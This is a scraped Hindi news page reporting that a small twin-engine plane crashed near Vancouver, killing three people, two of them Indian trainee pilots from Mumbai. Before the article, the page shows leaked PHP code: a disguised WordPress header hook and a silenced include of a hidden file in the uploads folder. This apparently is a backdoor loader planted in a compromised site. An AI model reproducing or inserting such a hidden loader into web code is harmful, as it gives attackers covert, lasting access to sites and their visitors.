add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); Canada Plane Crash: कनाडा के वैंकूवर में प्लेन क्रैश, दो भारतीय ट्रेनी पायलट समेत तीन की मौत – SOCH INDIA
Menu

देश
Canada Plane Crash: कनाडा के वैंकूवर में प्लेन क्रैश, दो भारतीय ट्रेनी पायलट समेत तीन की मौत

nobanner

कनाडा में वैंकूवर के पास चिल्लीवैक में एक छोटा विमान दुर्घटनाग्रस्त हो गया. विमान दुर्घटना में दो भारतीय ट्रेनी पायलट सहित तीन लोगों की मौत हो गई. स्थानीय मीडिया के मुताबिक, इलाके में एक पेड़ से टकराने के बाद विमान दुर्घटनाग्रस्त हो गया. मीडिया रिपोर्टों के मुताबिक, हादसे में मरने वाले दोनों भारतीय पायलट का नाम अभय गडरू और यश विजय रामुगाडे है और वह मुंबई के रहने वाले थे. स्थानीय अधिकारी घटनास्थल पर पहुंच का जांच कर रहे हैं.

कनाडा पुलिस ने बयान में कहा, ‘घटनास्थल का मुआयना कर लिया गया है और इलाके में लोगों के हताहत होने या किसी जोखिम की कोई सूचना नहीं है. ये हादसा दो इंजन वाले छोटे विमान जिसका नाम पाइपर पीए -34 सेनेका है उसमें हुआ है.’